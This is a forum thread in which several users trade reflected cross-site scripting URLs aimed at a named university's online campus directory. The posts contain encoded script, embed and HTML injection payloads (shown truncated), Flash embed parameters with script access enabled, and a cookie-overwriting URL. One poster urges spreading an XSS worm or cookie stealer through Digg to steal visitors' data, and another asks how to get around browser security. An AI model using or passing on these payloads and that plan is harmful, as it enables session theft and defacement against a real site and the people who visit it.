Jump to content

URL haks...awesome!


jmaxxz
 Share

Recommended Posts

And now you have sum XSS

http://www.msoe.edu/campus/directory/detai...3E%3C/SCRIPT%3E

http://www.msoe.edu/campus/directory/detai...SCRIPT%3E%22%3E

http://www.msoe.edu/campus/directory/detai...3C%3C/SCRIPT%3E

Now what you do is get an xss worm or cookie stealer and submit that to digg(because they are all retarded) and have people click in and steal their booty. Reddit wouldnt fall for that shit.

Link to comment
Share on other sites

hmm crap mine is running into the browser's security settings...anyway around this?

http://www.msoe.edu/campus/directory/detai...3E%3C/SCRIPT%3E

(someone wanted a new version with image replacement, and this is an early test)

Link to comment
Share on other sites

http://www.msoe.edu/campus/directory/detai...3E%3C/SCRIPT%3E

http://www.msoe.edu/campus/directory/detai...13237.gif%22%3E

can i has prize nao? If you want to you can even design a new layout via .js. XSS is a wonderful thing.

Adding .swf

http://www.msoe.edu/campus/directory/detai...%3E%3C/EMBED%3E

you can also control the size with other params

type="application/x-shockwave-flash"

allowscriptaccess="always"

allowfullscreen="true"

width="10000" height="10000"

Editing html... this is pretty good stuff if you know how to use it.

http://www.msoe.edu/campus/directory/detai...Y%3E%3C/HTML%3E

Edit cookies (use ID will now be SHIT)

http://www.msoe.edu/campus/directory/detai...ERID=SHIT%22%3E

Now you can do other things but since that site is played out I am done.. I think I have done enough

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...